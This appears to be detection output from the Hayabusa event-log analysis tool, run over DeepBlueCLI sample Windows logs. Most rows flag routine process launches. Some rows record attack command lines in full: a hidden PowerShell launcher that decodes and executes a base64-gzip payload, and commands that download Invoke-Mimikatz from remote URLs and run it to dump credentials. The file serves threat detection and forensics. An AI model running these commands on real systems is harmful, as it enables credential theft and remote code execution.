IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | 
LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | 
PID: 0xfa0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
